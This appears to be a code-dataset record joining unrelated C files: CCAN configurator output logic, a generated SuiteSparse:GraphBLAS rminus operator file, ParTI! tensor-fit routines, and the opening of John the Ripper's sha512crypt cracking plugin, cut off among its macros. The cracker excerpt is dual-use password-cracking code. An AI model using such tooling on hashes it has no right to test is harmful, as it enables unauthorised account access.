" <compiler> <flags> will have \"<outflag> <outfile> <infile.c>\" appended\n"
"Default: %s %s %s\n",
DEFAULT_COMPILER, DEFAULT_FLAGS,
DEFAULT_OUTPUT_EXE_FLAG);
exit(0);
}
if (strncmp(argv[1], "-O", 2) == 0) {
argc--;
argv++;
outflag = argv[1] + 2;
if (!*outflag) {
fprintf(stderr,
"%s: option requires an argument -- O\n",
argv[0]);
exit(EXIT_BAD_USAGE);
}
} else if (strcmp(argv[1], "-v") == 0) {
argc--;
argv++;
verbose++;
} else if (strcmp(argv[1], "-vv") == 0) {
argc--;
argv++;
verbose += 2;
} else if (strncmp(argv[1], "--configurator-cc=", 18) == 0) {
configurator_cc = argv[1] + 18;
argc--;
argv++;
} else if (strncmp(argv[1], "--var-file=", 11) == 0) {
varfile = argv[1] + 11;
argc--;
argv++;
} else if (strcmp(argv[1], "--autotools-style") == 0) {
like_a_libtool = true;
argc--;
argv++;
} else if (strncmp(argv[1], "--header-file=", 14) == 0) {
headerfile = argv[1] + 14;
argc--;
argv++;
} else if (strcmp(argv[1], "--extra-tests") == 0) {
extra_tests = true;
argc--;
argv++;
} else if (strcmp(argv[1], "--") == 0) {
break;
} else if (argv[1][0] == '-') {
c12r_errx(EXIT_BAD_USAGE, "Unknown option %s", argv[1]);
} else {
break;
}
}
if (argc == 1)
argv = default_args;
/* Copy with NULL entry at end */
tests = calloc(sizeof(base_tests)/sizeof(base_tests[0]) + 1,
sizeof(base_tests[0]));
memcpy(tests, base_tests, sizeof(base_tests));
if (extra_tests)
read_tests(sizeof(base_tests)/sizeof(base_tests[0]));
orig_cc = argv[1];
if (configurator_cc)
argv[1] = configurator_cc;
cmd = connect_args(argv, outflag, OUTPUT_FILE " " INPUT_FILE);
if (like_a_libtool) {
start_test("Making autoconf users comfortable", "");
sleep(1);
end_test(1);
}
for (i = 0; tests[i].name; i++)
run_test(cmd, &tests[i]);
free(cmd);
remove(OUTPUT_FILE);
remove(INPUT_FILE);
if (varfile) {
FILE *vars;
if (strcmp(varfile, "-") == 0)
vars = stdout;
else {
start_test("Writing variables to ", varfile);
vars = fopen(varfile, "a");
if (!vars)
c12r_err(EXIT_TROUBLE_RUNNING,
"Could not open %s", varfile);
}
for (i = 0; tests[i].name; i++)
fprintf(vars, "%s=%u\n", tests[i].name, tests[i].answer);
if (vars != stdout) {
if (fclose(vars) != 0)
c12r_err(EXIT_TROUBLE_RUNNING,
"Closing %s", varfile);
end_test(1);
}
}
if (headerfile) {
start_test("Writing header to ", headerfile);
outf = fopen(headerfile, "w");
if (!outf)
c12r_err(EXIT_TROUBLE_RUNNING,
"Could not open %s", headerfile);
} else
outf = stdout;
fprintf(outf, "/* Generated by CCAN configurator */\n"
"#ifndef CCAN_CONFIG_H\n"
"#define CCAN_CONFIG_H\n");
fprintf(outf, "#ifndef _GNU_SOURCE\n");
fprintf(outf, "#define _GNU_SOURCE /* Always use GNU extensions. */\n");
fprintf(outf, "#endif\n");
fprintf(outf, "#define CCAN_COMPILER \"%s\"\n", orig_cc);
cmd = connect_args(argv + 1, "", "");
fprintf(outf, "#define CCAN_CFLAGS \"%s\"\n", cmd);
free(cmd);
fprintf(outf, "#define CCAN_OUTPUT_EXE_CFLAG \"%s\"\n\n", outflag);
/* This one implies "#include <ccan/..." works, eg. for tdb2.h */
fprintf(outf, "#define HAVE_CCAN 1\n");
for (i = 0; tests[i].name; i++)
fprintf(outf, "#define %s %u\n", tests[i].name, tests[i].answer);
fprintf(outf, "#endif /* CCAN_CONFIG_H */\n");
if (headerfile) {
if (fclose(outf) != 0)
c12r_err(EXIT_TROUBLE_RUNNING, "Closing %s", headerfile);
end_test(1);
}
return 0;
}
|
GB_binop__rminus_fp32.c |
//------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2022, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCUDA_DEV
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__rminus_fp32)
// A.*B function (eWiseMult): GB (_AemultB_08__rminus_fp32)
// A.*B function (eWiseMult): GB (_AemultB_02__rminus_fp32)
// A.*B function (eWiseMult): GB (_AemultB_04__rminus_fp32)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__rminus_fp32)
// A*D function (colscale): GB (_AxD__rminus_fp32)
// D*A function (rowscale): GB (_DxB__rminus_fp32)
// C+=B function (dense accum): GB (_Cdense_accumB__rminus_fp32)
// C+=b function (dense accum): GB (_Cdense_accumb__rminus_fp32)
// C+=A+B function (dense ewise3): GB (_Cdense_ewise3_accum__rminus_fp32)
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__rminus_fp32)
// C=scalar+B GB (_bind1st__rminus_fp32)
// C=scalar+B' GB (_bind1st_tran__rminus_fp32)
// C=A+scalar GB (_bind2nd__rminus_fp32)
// C=A'+scalar GB (_bind2nd_tran__rminus_fp32)
// C type: float
// A type: float
// A pattern? 0
// B type: float
// B pattern? 0
// BinaryOp: cij = (bij - aij)
#define GB_ATYPE \
float
#define GB_BTYPE \
float
#define GB_CTYPE \
float
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
float aij = GBX (Ax, pA, A_iso)
// true if values of A are not used
#define GB_A_IS_PATTERN \
    0
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
float bij = GBX (Bx, pB, B_iso)
// true if values of B are not used
#define GB_B_IS_PATTERN \
    0
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
float t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = (y - x) ;
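// ("rminus" is MINUS with its operands flipped; per the table above,
// cij = (bij - aij), hence z = y - x here.)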
// true if the binop must be flipped
#define GB_BINOP_FLIP \
0
// op is second
#define GB_OP_IS_SECOND \
0
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_RMINUS || GxB_NO_FP32 || GxB_NO_RMINUS_FP32)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB (_Cdense_ewise3_accum__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
void GB (_Cdense_ewise3_noaccum__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_noaccum_template.c"
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
#include "GB_dense_subassign_23_template.c"
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__rminus_fp32)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
// get the scalar b for C += b, of type float
float bwork = (*((float *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_AxD__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix D,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float *restrict Cx = (float *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_DxB__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix D,
const GrB_Matrix B,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float *restrict Cx = (float *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseAdd: C=A+B, C<M>=A+B, C<!M>=A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__rminus_fp32)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool is_eWiseUnion,
const GB_void *alpha_scalar_in,
const GB_void *beta_scalar_in,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
float alpha_scalar ;
float beta_scalar ;
if (is_eWiseUnion)
{
alpha_scalar = (*((float *) alpha_scalar_in)) ;
beta_scalar = (*((float *) beta_scalar_in )) ;
}
#include "GB_add_template.c"
GB_FREE_WORKSPACE ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, or C<M!>=A.*B where C is sparse/hyper
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_08__rminus_fp32)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_08_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_04__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_04_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__rminus_fp32)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
GrB_Info GB (_bind1st__rminus_fp32)
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float *Cx = (float *) Cx_output ;
float x = (*((float *) x_input)) ;
float *Bx = (float *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
float bij = GBX (Bx, p, false) ;
Cx [p] = (bij - x) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
GrB_Info GB (_bind2nd__rminus_fp32)
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
float *Cx = (float *) Cx_output ;
float *Ax = (float *) Ax_input ;
float y = (*((float *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
float aij = GBX (Ax, p, false) ;
Cx [p] = (y - aij) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
float aij = GBX (Ax, pA, false) ; \
Cx [pC] = (aij - x) ; \
}
GrB_Info GB (_bind1st_tran__rminus_fp32)
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
float
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float x = (*((const float *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
float
}
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
float aij = GBX (Ax, pA, false) ; \
Cx [pC] = (y - aij) ; \
}
GrB_Info GB (_bind2nd_tran__rminus_fp32)
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
float y = (*((const float *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
rankktensor.c | /*
This file is part of ParTI!.
ParTI! is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
ParTI! is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with ParTI!.
If not, see <http://www.gnu.org/licenses/>.
*/
#include <HiParTI.h>
#include <stdlib.h>
#include <string.h>
#include <math.h>	/* sqrt()/fabs() used below (may also come in via HiParTI.h) */
int ptiNewRankKruskalTensor(ptiRankKruskalTensor *ktsr, ptiIndex nmodes, const ptiIndex ndims[], ptiElementIndex rank)
{
ktsr->nmodes = nmodes;
ktsr->rank = rank;
ktsr->ndims = (ptiIndex*)malloc(nmodes*sizeof(ptiIndex));
for(ptiIndex i=0; i<nmodes; ++i)
ktsr->ndims[i] = ndims[i];
ktsr->lambda = (ptiValue*)malloc(rank*sizeof(ptiValue));
ktsr->fit = 0.0;
return 0;
}
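/* Note: ktsr->factors is not allocated here; the caller is expected to
 * attach the factor matrices separately before use (they are released
 * later by ptiFreeRankKruskalTensor). */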
/**
 * Shuffle the factor matrices' row indices back into the original order.
 *
 * @param[in,out] ktsr      Kruskal tensor whose factor rows are renumbered
 * @param[in]     map_inds  the per-mode renumbering mapping
 *
 */
void ptiRankKruskalTensorInverseShuffleIndices(ptiRankKruskalTensor * ktsr, ptiIndex ** map_inds) {
/* Renumber factor matrices rows */
ptiIndex new_i;
for(ptiIndex m=0; m < ktsr->nmodes; ++m) {
ptiRankMatrix * mtx = ktsr->factors[m];
ptiIndex * mode_map_inds = map_inds[m];
ptiValue * tmp_values = malloc(mtx->cap * mtx->stride * sizeof (ptiValue));
for(ptiIndex i=0; i<mtx->nrows; ++i) {
new_i = mode_map_inds[i];
for(ptiElementIndex j=0; j<mtx->ncols; ++j) {
tmp_values[i * mtx->stride + j] = mtx->values[new_i * mtx->stride + j];
}
}
free(mtx->values);
mtx->values = tmp_values;
}
}
void ptiFreeRankKruskalTensor(ptiRankKruskalTensor *ktsr)
{
ktsr->rank = 0;
ktsr->fit = 0.0;
free(ktsr->ndims);
free(ktsr->lambda);
for(ptiIndex i=0; i<ktsr->nmodes; ++i)
ptiFreeRankMatrix(ktsr->factors[i]);
free(ktsr->factors);
ktsr->nmodes = 0;
}
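/* Fit of the Kruskal (CP) model K against the sparse tensor X, using the
 * standard CP-ALS convergence measure:
 *   residual = sqrt( ||X||_F^2 + ||K||_F^2 - 2 <X, K> )
 *   fit      = 1 - residual / ||X||_F
 * ||K||_F^2 comes from the lambda-weighted Hadamard product of the "ata"
 * Gram matrices; <X, K> reuses the last MTTKRP result (mats[nmodes]). */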
double KruskalTensorFitHiCOO(
ptiSparseTensorHiCOO const * const hitsr,
ptiValue const * const __restrict lambda,
ptiRankMatrix ** mats,
ptiRankMatrix ** ata)
{
ptiIndex const nmodes = hitsr->nmodes;
double ptien_normsq = SparseTensorFrobeniusNormSquaredHiCOO(hitsr);
// printf("ptien_normsq: %lf\n", ptien_normsq);
double const norm_mats = KruskalTensorFrobeniusNormSquaredRank(nmodes, lambda, ata);
// printf("norm_mats: %lf\n", norm_mats);
double const inner = SparseKruskalTensorInnerProductRank(nmodes, lambda, mats);
// printf("inner: %lf\n", inner);
double residual = ptien_normsq + norm_mats - 2 * inner;
if (residual > 0.0) {
residual = sqrt(residual);
}
// printf("residual: %lf\n", residual);
double fit = 1 - (residual / sqrt(ptien_normsq));
return fit;
}
// Column-major.
/* A Kruskal tensor's norm is computed on the "ata"s. Check Tammy's sparse */
double KruskalTensorFrobeniusNormSquaredRank(
ptiIndex const nmodes,
ptiValue const * const __restrict lambda,
ptiRankMatrix ** ata) // ata: column-major
{
ptiElementIndex const rank = ata[0]->ncols;
ptiElementIndex const stride = ata[0]->stride;
ptiValue * const __restrict tmp_atavals = ata[nmodes]->values; // Column-major
double norm_mats = 0;
#ifdef HIPARTI_USE_OPENMP
#pragma omp parallel for schedule(static)
#endif
for(ptiIndex x=0; x < rank*stride; ++x) {
tmp_atavals[x] = 1.;
}
// printf("KruskalTensorFrobeniusNormSquaredRank: \n");
// ptiDumpRankMatrix(ata[nmodes], stdout);
/* Compute Hadamard product for all "ata"s */
for(ptiIndex m=0; m < nmodes; ++m) {
ptiValue const * const __restrict atavals = ata[m]->values;
#ifdef HIPARTI_USE_OPENMP
#pragma omp parallel for schedule(static)
#endif
for(ptiElementIndex i=0; i < rank; ++i) {
for(ptiElementIndex j=i; j < rank; ++j) {
tmp_atavals[j * stride + i] *= atavals[j * stride + i];
}
}
}
// printf("KruskalTensorFrobeniusNormSquaredRank: \n");
// ptiDumpRankMatrix(ata[nmodes], stdout);
/* compute lambda^T * aTa[MAX_NMODES] * lambda; only half the entries are visited because the matrix is symmetric */
// #ifdef HIPARTI_USE_OPENMP
// #pragma omp parallel for schedule(static) reduction(+:norm_mats)
// #endif
for(ptiElementIndex i=0; i < rank; ++i) {
norm_mats += tmp_atavals[i+(i*stride)] * lambda[i] * lambda[i];
for(ptiElementIndex j=i+1; j < rank; ++j) {
norm_mats += tmp_atavals[i+(j*stride)] * lambda[i] * lambda[j] * 2;
}
// printf("inter norm_mats: %lf\n", norm_mats);
}
return fabs(norm_mats);
}
// Row-major, compute via MTTKRP result (mats[nmodes]) and mats[nmodes-1].
double SparseKruskalTensorInnerProductRank(
ptiIndex const nmodes,
ptiValue const * const __restrict lambda,
ptiRankMatrix ** mats)
{
ptiElementIndex const rank = mats[0]->ncols;
ptiElementIndex const stride = mats[0]->stride;
ptiIndex const last_mode = nmodes - 1;
ptiIndex const I = mats[last_mode]->nrows;
// printf("mats[nmodes-1]:\n");
// ptiDumpMatrix(mats[nmodes-1], stdout);
// printf("mats[nmodes]:\n");
// ptiDumpMatrix(mats[nmodes], stdout);
ptiValue const * const last_vals = mats[last_mode]->values;
ptiValue const * const tmp_vals = mats[nmodes]->values;
ptiValue * buffer_accum;
double inner = 0;
double * const __restrict accum = (double *) malloc(rank*sizeof(*accum));
#ifdef HIPARTI_USE_OPENMP
#pragma omp parallel for schedule(static)
#endif
for(ptiElementIndex r=0; r < rank; ++r) {
accum[r] = 0.0;
}
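	/* Manual reduction for the OpenMP path: each thread sums its partial
	 * products into its own rank-sized slice of buffer_accum, and the
	 * slices are folded into accum afterwards. (A reduction clause over a
	 * heap array would need OpenMP 4.5+ array sections, so this stays
	 * portable.) */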
#ifdef HIPARTI_USE_OPENMP
#pragma omp parallel
{
int const nthreads = omp_get_num_threads();
#pragma omp master
{
buffer_accum = (ptiValue *)malloc(nthreads * rank * sizeof(ptiValue));
for(ptiIndex j=0; j < (ptiIndex)nthreads * rank; ++j)
buffer_accum[j] = 0.0;
}
}
#endif
#ifdef HIPARTI_USE_OPENMP
#pragma omp parallel
{
int const tid = omp_get_thread_num();
int const nthreads = omp_get_num_threads();
ptiValue * loc_accum = buffer_accum + tid * rank;
#pragma omp for
for(ptiIndex i=0; i < I; ++i) {
for(ptiElementIndex r=0; r < rank; ++r) {
loc_accum[r] += last_vals[r+(i*stride)] * tmp_vals[r+(i*stride)];
}
}
#pragma omp for schedule(static)
for(ptiElementIndex j=0; j < rank; ++j) {
for(ptiIndex i=0; i < (ptiIndex)nthreads; ++i) {
accum[j] += buffer_accum[i*rank + j];
}
}
}
#else
for(ptiIndex i=0; i < I; ++i) {
for(ptiElementIndex r=0; r < rank; ++r) {
accum[r] += last_vals[r+(i*stride)] * tmp_vals[r+(i*stride)];
}
}
#endif
#ifdef HIPARTI_USE_OPENMP
#pragma omp parallel for schedule(static) reduction(+:inner)
#endif
for(ptiElementIndex r=0; r < rank; ++r) {
inner += accum[r] * lambda[r];
}
#ifdef HIPARTI_USE_OPENMP
free(buffer_accum);
#endif
return inner;
} |
cryptsha512_fmt_plug.c | /*
* This file is part of John the Ripper password cracker,
* based on rawSHA256_fmt.c code and Drepper's spec at
* http://www.akkadia.org/drepper/SHA-crypt.txt
*
* This software is Copyright (c) 2012 magnum, and it is hereby released to the
* general public under the following terms: Redistribution and use in source
* and binary forms, with or without modification, are permitted.
*
* See code/comments in cryptsha256 for how and why this is being done. NOTE,
 * we could limit ourselves to 15 byte passwords, and then only need 1-limb
 * SHA512 SIMD logic. If we allow 2-limb logic, then 79 byte passwords are the
 * max. This is better than cryptsha256, where if we only allowed 1 limb, only
 * 3 byte passwords would have been max, and even at 2 limbs, 35 byte passwords
 * are the longest we can do.
*
* Porting to SSE2, May 2015, JimF. A little harder than some, since we have to
* group and rearrange passwords based upon length. We must only run passwords
* of a specific block group size in 1 SSE_COEF_SHA512 bundle. If we later do
* PARA_SHA512, then each bundle of SSE_COEF_SHA512*PARA_SHA512 will have to be
* made up of passwords of same block group size.
*
* Here are the block sizes per password length. To be equal group size, all
* numbers for 2 passwords must be equal all the way across. So, password
* lengths of 0, 1, ... 15 are 1 group. 16..23 are another group. 24..31 are
* yet another, etc. There are 5 'groups' of lengths.
*
 * Here is the raw block length data. Only the first and last lengths for each group have been kept.
Len: cp pspc cspp ppc cpp psc csp pc
0 : 1 1 1 1 1 1 1 1
15 : 1 1 1 1 1 1 1 1
16 : 1 2 2 1 1 1 1 1
23 : 1 2 2 1 1 1 1 1
24 : 1 2 2 2 2 1 1 1
31 : 1 2 2 2 2 1 1 1
32 : 1 2 2 2 2 2 2 1
47 : 1 2 2 2 2 2 2 1
48 : 2 2 2 2 2 2 2 2
79 : 2 2 2 2 2 2 2 2
 Source to make above table (made up to 90, but over 79 is 3 limbs):
 #include <stdio.h>
 #include <stdlib.h>	/* for atoi() */
int c=64, s=16;
int S(int sz) {
if (sz<=111) return 1;
else if (sz <= 111+128) return 2;
else return 3;
}
void proc(int p) {
int cp=p+c;
printf("%-2d : %d %d %d %d %d %d %d %d\n",
p,S(cp),S(cp+s+p),S(cp+s+p),S(cp+p),S(cp+p),S(cp+s),S(cp+s),S(cp));
}
 int main(int argc, char **argv) {
 int i;
 if (argc==2) s=atoi(argv[1]);
 printf("Len: cp pspc cspp ppc cpp psc csp pc (saltlen=%d)\n",s);
 for (i = 0; i < 90; ++i)
 proc(i);
 return 0;
 }
*/
#if FMT_EXTERNS_H
extern struct fmt_main fmt_cryptsha512;
#elif FMT_REGISTERS_H
john_register_one(&fmt_cryptsha512);
#else
#include "arch.h"
//#undef SIMD_COEF_64
#include "sha2.h"
#define _GNU_SOURCE 1
#include <string.h>
#include "params.h"
#include "common.h"
#include "formats.h"
#include "johnswap.h"
#include "simd-intrinsics.h"
#ifdef _OPENMP
#ifndef OMP_SCALE
#define OMP_SCALE 16
#endif
#include <omp.h>
#endif
#include "memdbg.h"
// NOTE, in SSE mode, even if NOT in OMP, we may need to scale, quite a bit, due to needing
// to 'group' passwords differently, so that we have lengths which 'share' the same number
// of crypt block counts for each 'type'. We may want to scale as much as 128 or so, just
// to try to have better saturation. If we only had 8 passwords given to us, and they were
// one each of these lengths: 3 7 8 12 13 14 15 21, in theory, we could do this
// with only 2 SSE calls (SIMD_COEF_32==4 for SHA256). However, length 3 has to run by itself,
// length 7 by itself, 8 by itself, and the rest can run together, but there are 5 of them,
// so it takes two runs. So, instead of 2 runs, we have to do 5 runs. Not very efficient.
// however, if we have a lot more passwords to work with, we can re-arrange them, to run
// them in groups that all 'fit' together, and do so until we exhaust all from a given length
// range, then do all in the next range. Thus, until we get to the last set within a length
// range, we are doing a fully packed SSE run, and having a LOT less wasted space. This will
// get even more interesting, when we start doing OMP, but it should just be the same principle,
// preload more passwords, and group them, then run the OMP threads over a single length, then
// go to the next length, until done, trying to keep each thread running, and keeping each block
// of SSE data full, until the last in a range. We probably can simply build all the rearrangements,
// then let the threads go on ALL data, without caring about the length, since each thread will only
// be working on passwords in a single MMX buffer that all match, at any given moment.
#ifdef SIMD_COEF_64
#ifdef _OPENMP
#define SIMD_COEF_SCALE (32/SIMD_COEF_64)
#else
#define SIMD_COEF_SCALE (64/SIMD_COEF_64)
#endif
#else
#define SIMD_COEF_SCALE 1
#endif
#define FORMAT_LABEL "sha512crypt"
#ifdef SIMD_COEF_64
#define ALGORITHM_NAME SHA512_ALGORITHM_NAME
#else
#if ARCH_BITS >= 64
#define ALGORITHM_NAME "64/" ARCH_BITS_STR " " SHA2_LIB
#else
#define ALGORITHM_NAME "32/" ARCH_BITS_STR " " SHA2_LIB
#endif
#endif
// 79 is max length we can do in 2 SIMD limbs, so just make it 79 always.
#define PLAINTEXT_LENGTH 79
#define BINARY_ALIGN 4
#define SALT_SIZE sizeof(struct saltstruct)
#define SALT_ALIGN 4
#ifdef SIMD_COEF_64
#define MIN_KEYS_PER_CRYPT (SIMD_COEF_64*SIMD_PARA_SHA512)
